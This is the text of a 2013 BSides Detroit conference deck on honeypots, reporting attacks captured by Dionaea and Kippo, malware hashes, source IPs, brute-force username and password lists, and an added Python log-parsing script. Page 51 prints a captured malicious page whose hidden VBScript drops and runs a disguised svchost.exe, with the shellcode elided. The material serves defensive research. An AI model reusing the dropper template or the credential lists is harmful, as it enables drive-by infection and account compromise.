bsides detroit 2013 honeypots

Be vewy, vewy quiet…. let’s watch some hackers..

Upload: tazdrumm3r

Post on 04-Jul-2015


Page 1: Bsides detroit 2013   honeypots


Page 2: Bsides detroit 2013   honeypots

Interactive portion intro

Whoami

What is a Honeypot?

Different Honeypots

Why Honeypots?

Things I discovered

Stratagem

Interactive portion end results

Page 3: Bsides detroit 2013   honeypots

Interactive portion

SSID – FBI Mobile

IP address – 192.168.2.5

User ID – bsides

The password is… detroit (told you it was easy)

Page 4: Bsides detroit 2013   honeypots

Father

Husband

Page 5: Bsides detroit 2013   honeypots

Geek

Antagonist of the shiny things

Page 6: Bsides detroit 2013   honeypots

ShadowServer.org volunteer

Security analyst

Whoami

Page 7: Bsides detroit 2013   honeypots

A Honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)

Page 8: Bsides detroit 2013   honeypots

Why Honeypots?

Page 9: Bsides detroit 2013   honeypots

Why Honeypots?

Page 10: Bsides detroit 2013   honeypots

Low Interaction Server Honeypots

HoneyD

Page 11: Bsides detroit 2013   honeypots

Low Interaction Server Honeypots

Conpot

Page 12: Bsides detroit 2013   honeypots

Different Honeypots

Client-side Honeypots

Page 13: Bsides detroit 2013   honeypots

Windows XP SP 0, Windows Vista SP 0

Client Honeypots – High Interaction

Different Honeypots

Page 14: Bsides detroit 2013   honeypots
Page 15: Bsides detroit 2013   honeypots

Initial Research

Page 16: Bsides detroit 2013   honeypots

A word of advice on using an EC2 instance.

Page 17: Bsides detroit 2013   honeypots
Page 18: Bsides detroit 2013   honeypots

GeoIP location: Dionaea – Ireland

Page 19: Bsides detroit 2013   honeypots

Dionaea stats

Started 3/7/2013 – Stopped 3/9/2013

Started 3/12/2013 – Stopped 3/14/2013

Graphs are courtesy of the DionaeaFR tool

Page 20: Bsides detroit 2013   honeypots

Dionaea stats

• Don’t forget to add your API key from VirusTotal to your config file!!

• If you don’t add the API key, then the pretty visualization tool can’t do its job and you have to do the lookups manually!!!

Page 21: Bsides detroit 2013   honeypots

Dionaea stats – Top 10 IP addresses (chart of connection counts per source IP)

Page 22: Bsides detroit 2013   honeypots

Wireshark Analysis – Attack Attempts

Page 23: Bsides detroit 2013   honeypots

Malware Captures – MD5, VirusTotal detection ratio, common name, source IP address / WhoIs

78c9042bbcefd65beaa0d40386da9f89
• VirusTotal: 44 / 46 – Microsoft: Worm:Win32/Conficker.C
• Source: 209.190.25.37 – XLHost, VPS provider – http://www.xlhost.com/

7acba0d01e49618e25744d9a08e6900c
• VirusTotal: 45 / 46 – Microsoft: Worm:Win32/Conficker.B
• Source: 69.28.137.10 – LimeLight Networks, a Digital Presence Management company – http://www.limelight.com/

90c081de8a30794339d96d64b86ae194
• VirusTotal: 42 / 43 – Kaspersky: Backdoor.Win32.Rbot.aftu
• Source: 69.38.10.83 – WindStream Communications, voice and data provider – http://NuVox.net

bcaef2729405ae54d62cb5ed097efa12
• VirusTotal: 43 / 44 – Kaspersky: Backdoor.Win32.Rbot.bqj
• Source: 69.9.236.128 – Midwest Communications, Comcast/WideOpenWest parallel – http://midco.net/

Page 24: Bsides detroit 2013   honeypots

GeoIP location: Dionaea – recent

Page 25: Bsides detroit 2013   honeypots

Dionaea – Detection

Page 26: Bsides detroit 2013   honeypots

Dionaea – Detection

Page 27: Bsides detroit 2013   honeypots

Dionaea – Detection

Page 28: Bsides detroit 2013   honeypots

Kippo

Started 2/27/2013 – Stopped 3/1/2013

IP addresses
• 14 unique IP addresses
• Maximum password attempts – 1342
• Successful logins – 7
• Replay scripts – 1
• Files uploaded – 1

Page 29: Bsides detroit 2013   honeypots

Kippo stats, 2/27 to 3/1 – Attacker's IP addresses / connection attempts (chart)

Page 30: Bsides detroit 2013   honeypots

GeoIP location: Kippo – recent

Page 31: Bsides detroit 2013   honeypots

Kippo stats – Top 25 User names, 2/27 – 3/1 (chart of times tried)

root, bin, oracle, test, nagios, martin, toor, ftpuser, user, postgres, info, webmaster, apache, backup, guest, r00t, public, green, demo, site, jeff, andy, i-heart, user0, content

Page 32: Bsides detroit 2013   honeypots

Kippo stats – Top 25 Passwords, 2/27 to 3/1 (chart of tries)

Page 33: Bsides detroit 2013   honeypots

Kippo stats

Accounts that used 123456 as password

User ID – Tries
root – 7
ftpuser – 3
oracle – 3
andy – 2
info – 2
jeff – 2
site – 2
test – 2
webmaster – 2
areyes – 1
brian – 1

“7 successful logons? But your chart says 27 used the password of 123456?! WTF?”
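Why 27 tries of 123456 produce only 7 logins, as an added example that is not part of the deck: Kippo only accepts the username/password pairs in its userdb (root/123456 in the shipped data/userdb.txt), so 123456 against ftpuser, oracle or andy fails. The script below parses constructed log lines written in Kippo's "login attempt [user/pass] succeeded/failed" style and reproducing the slide's per-username counts; the userdb contents, the sample IP and the regex are assumptions.

```python
import re
from collections import Counter

# Assumption: the honeypot accepts only the pairs in its userdb. Kippo's shipped
# data/userdb.txt knows exactly one account, root with password 123456.
HONEYPOT_USERDB = {"root": "123456"}

# Constructed from the slide: how often each username was tried with 123456.
ATTEMPTS_123456 = {"root": 7, "ftpuser": 3, "oracle": 3, "andy": 2, "info": 2,
                   "jeff": 2, "site": 2, "test": 2, "webmaster": 2,
                   "areyes": 1, "brian": 1}

# Kippo logs one line per SSH auth attempt in this shape (assumed format; the
# sample lines are constructed and 198.51.100.7 is a documentation address).
LOGIN_RE = re.compile(r"login attempt \[([^/\]]+)/([^\]]*)\] (succeeded|failed)")


def build_sample_log():
    """Render the slide's counts as Kippo-style log lines (constructed data)."""
    lines = []
    for user, tries in ATTEMPTS_123456.items():
        for i in range(tries):
            ok = HONEYPOT_USERDB.get(user) == "123456"
            lines.append(f"2013-02-28 01:{i:02d}:00+0000 [SSHService ssh-userauth on "
                         f"HoneyPotTransport,{i},198.51.100.7] login attempt "
                         f"[{user}/123456] {'succeeded' if ok else 'failed'}")
    # One attempt with another password so the password ranking has more than one key.
    lines.append("2013-02-28 02:00:00+0000 [SSHService ssh-userauth on "
                 "HoneyPotTransport,9,198.51.100.7] login attempt [root/toor] failed")
    return lines


def summarize(lines):
    """Return (tries per password, tries per username for each password, successes)."""
    per_password = Counter()
    users_for_password = {}
    successes = 0
    for line in lines:
        m = LOGIN_RE.search(line)
        if not m:
            continue  # not an auth line (session open/close, commands, ...)
        user, password, outcome = m.groups()
        per_password[password] += 1
        users_for_password.setdefault(password, Counter())[user] += 1
        successes += outcome == "succeeded"
    return per_password, users_for_password, successes


if __name__ == "__main__":
    per_password, users, successes = summarize(build_sample_log())
    print("123456 tried:", per_password["123456"], "successful logins:", successes)
    print("by user:", users["123456"].most_common())
```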

Page 34: Bsides detroit 2013   honeypots

Kippo stats

root öÎÄ¥þ.òÄ¿Â¥
root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs
root $hack4m3baby#b1gbroth3r$
root 654321
root Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD
root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!&
root diffie-hellman-group-exchange-sha11
root 123
root 1234
root 12345
root 1234567
root 12345678
root 123456789
root deathfromromaniansecurityteamneversleepba
root rooooooooooooooooooooooooooooooooot

root !Q@W#E$
root !Q@W#E$R
root !Q@W#E$R%
root !Q@W#E$R%T
root !Q@W#E$R%T^
root !Q@W#E$R%T^Y
root !Q@W#E$R%T^Y&
root !Q@W#E$R%T^Y&U
root !Q@W#E$R%T^Y&U*
root !Q@W#E$R%T^Y&U*I
root !Q@W#E$R%T^Y&U*I(
root !Q@W#E$R%T^Y&U*I(O
root !Q@W#E$R%T^Y&U*I(O)
root !Q@W#E$R%T^Y&U*I(O)P
root !Q@W#E$R%T^Y&U*I(O)P_

Interesting passwords

Page 35: Bsides detroit 2013   honeypots

Kippo stats – File downloaded

psyBNC 2.3.2

------------

This program is useful for people who cannot be on irc all the time. It's used to keep a connection to irc and your irc client connected, or also allows it to act as a normal bouncer by disconnecting from the irc server when the client disconnects.

Page 36: Bsides detroit 2013   honeypots

Kippo

Started 5/31/2013 – Stopped 6/1/2013

IP addresses
• Unique IP addresses – 20
• Maximum password attempts – 1098
• Successful logins – 16
• Replay scripts – 4
• Files uploaded – 1

Page 37: Bsides detroit 2013   honeypots

Kippo stats, 5/31 to 6/1 – Attackers' IP addresses / connection attempts (chart)

Page 38: Bsides detroit 2013   honeypots

Kippo stats – Top 25 passwords, 5/31 to 6/1 (chart of attempts)

Page 39: Bsides detroit 2013   honeypots

Kippo stats – Top 25 user names, 5/31 to 6/1 (chart of login attempts)

Page 40: Bsides detroit 2013   honeypots

Kippo stats – Replay script – 20130603-104907-9177.log

Just trying to run Perl

Page 41: Bsides detroit 2013   honeypots

Kippo stats – Replay script – 20130530-134418-3935.log

Upload of shellbot.pl

Page 42: Bsides detroit 2013   honeypots

Kippo stats – File downloaded

#!/usr/bin/perl
#
# ShellBOT by: devil__

Discovered: June 3, 2005
Updated: April 30, 2010 3:46:09 AM
Type: Trojan
Systems Affected: Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Backdoor.Shellbot is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer.

As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer.

Backdoor.Shellbot – Risk Level 1: Very Low

Page 43: Bsides detroit 2013   honeypots

Kippo stats – Replay script – 20130602-105723-5678.log

Uploads a tar.gz and trips a Python reply script

Page 44: Bsides detroit 2013   honeypots

Kippo – Detection

CTF replay scripts

Page 45: Bsides detroit 2013   honeypots

Kippo

• Config file changes
• Custom reply files

Lessons learned

Page 46: Bsides detroit 2013   honeypots

HoneyD

Page 47: Bsides detroit 2013   honeypots

Amun

Started 5/29 – Stopped 5/30

IP addresses
• Unique IP addresses – 3
• Files uploaded – 2

Page 48: Bsides detroit 2013   honeypots

Amun

Files uploaded

• Azenv.php (uploaded twice)
• ProxyJudge script

Page 49: Bsides detroit 2013   honeypots

Thug

• Honeyclient
• Mimics client behavior
• Browser
• Plug-ins for 3rd party apps

Page 50: Bsides detroit 2013   honeypots

Mwcrawler

PE32 files
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 445
Infected files: 44
Data scanned: 510.42 MB
Data read: 353.98 MB (ratio 1.44:1)
Time: 147.925 sec (2 m 27 s)

Data
--- SCAN SUMMARY ---
Known viruses: 2340387
Engine version: 0.97.8
Scanned directories: 1
Scanned files: 4
Infected files: 1
Data scanned: 1.04 MB
Data read: 0.41 MB (ratio 2.57:1)
Time: 7.612 sec (0 m 7 s)

Page 51: Bsides detroit 2013   honeypots

Mwcrawler

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>
<body>
<p align="center"><h1>We're sorry,</h1><h2>The site is temporarly unavailable. Please check in next few days</h2></p>
</body></html>
<SCRIPT Language=VBScript>
<!--
DropFileName = "svchost.exe"
WriteData =

<Lots of shellcode>

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
</SCRIPT>

Page 52: Bsides detroit 2013   honeypots

How you can make your netbook useful and fun again!

Page 53: Bsides detroit 2013   honeypots

Project page

Goals
◦ Documentation

Tools
◦ Honeypots
◦ Network
◦ Malware
◦ Forensics
◦ Tools

Stratagem – http://sourceforge.net/projects/stratagem/

Page 54: Bsides detroit 2013   honeypots

Honeypots

◦ Dionaea

◦ Kippo

◦ Glastopf

◦ HoneyD

◦ Amun

◦ Labrea

◦ Tinyhoneypot

◦ Thug

◦ Conpot

Stratagem

Page 55: Bsides detroit 2013   honeypots

Network

◦ Scapy

◦ proxychains

◦ Ngrep

◦ Network Miner

◦ Amun

◦ Xplico

◦ Capanalysis

◦ Network

Malware

◦ Mwcrawler

◦ Yara

◦ ClamAV

Stratagem

Forensics

◦ Volatility

Tools

◦ Tor

◦ i2p

◦ Conky

◦ Guake

◦ Terminator

Page 56: Bsides detroit 2013   honeypots

Stratagem

Capanalysis

Page 57: Bsides detroit 2013   honeypots

Stratagem

Capanalysis

Page 58: Bsides detroit 2013   honeypots

Next?

Page 59: Bsides detroit 2013   honeypots

Resources

• A host at $IP ($location) tried to log into my honeypot's fake Terminal Services server
• GET-based RFI attack from $IP ($location)
• A host at $IP ($location) tried to log into my honeypot's fake MSSQL Server

http://inguardians.com/

Page 60: Bsides detroit 2013   honeypots

Resources

Page 61: Bsides detroit 2013   honeypots

Resources

Page 62: Bsides detroit 2013   honeypots

http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport

Page 63: Bsides detroit 2013   honeypots

Honeydrive

Page 64: Bsides detroit 2013   honeypots

Keith Dixon

@Tazdrumm3r

#misec – [email protected]

http://tazdrumm3r.wordpress.com